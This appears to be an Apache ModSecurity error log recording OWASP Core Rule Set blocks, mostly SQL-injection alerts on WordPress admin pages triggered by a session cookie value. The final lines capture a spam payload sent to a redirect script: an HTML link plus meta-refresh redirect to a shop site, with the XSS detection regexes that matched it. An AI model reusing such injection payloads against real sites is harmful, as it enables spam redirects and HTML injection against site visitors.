[Mon May 11 18:33:51.080438 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE70WKUxpmnkK7zHysGAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:51.745503 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE70WKUxpmnkK7zHysGAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:52.012052 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE8EWKUxpmnkK7zHysGgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:52.012383 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE8EWKUxpmnkK7zHysGgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:52.676403 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE8EWKUxpmnkK7zHysGgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:52.958356 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE8EWKUxpmnkK7zHysHAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:52.958648 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE8EWKUxpmnkK7zHysHAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:54.375944 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE8EWKUxpmnkK7zHysHAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:54.544554 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE8kWKUxpmnkK7zHysJQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:54.544834 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE8kWKUxpmnkK7zHysJQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:55.117295 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE8kWKUxpmnkK7zHysJQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:55.225066 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE80WKUxpmnkK7zHysKAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:55.225366 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE80WKUxpmnkK7zHysKAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:55.594442 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE80WKUxpmnkK7zHysKAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:55.879520 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE80WKUxpmnkK7zHysKQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:55.879806 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE80WKUxpmnkK7zHysKQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:56.532615 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE80WKUxpmnkK7zHysKQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:56.847782 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE9EWKUxpmnkK7zHysKgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:56.848066 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE9EWKUxpmnkK7zHysKgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:57.459668 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE9EWKUxpmnkK7zHysKgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:57.740979 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE9UWKUxpmnkK7zHysLAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:57.741282 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE9UWKUxpmnkK7zHysLAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:58.368336 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE9UWKUxpmnkK7zHysLAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:59.282927 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE90WKUxpmnkK7zHysMAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:59.283383 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE90WKUxpmnkK7zHysMAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:59.873980 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE90WKUxpmnkK7zHysMAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:00.045311 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE-EWKUxpmnkK7zHysMQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:00.045602 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE-EWKUxpmnkK7zHysMQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:00.429355 2026] [security2:error] [pid 1416109:tid 1416142] [client 27.78.84.116:56017] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE-FV4kyjgo4bQBUiBZAAAAMw"]
[Mon May 11 18:34:00.433227 2026] [security2:error] [pid 1416109:tid 1416142] [client 27.78.84.116:56017] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE-FV4kyjgo4bQBUiBZAAAAMw"]
[Mon May 11 18:34:00.434584 2026] [security2:error] [pid 1416109:tid 1416142] [client 27.78.84.116:56017] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-tr..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE-FV4kyjgo4bQBUiBZAAAAMw"]
[Mon May 11 18:34:00.437687 2026] [security2:error] [pid 1416109:tid 1416142] [client 27.78.84.116:56017] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE-FV4kyjgo4bQBUiBZAAAAMw"]
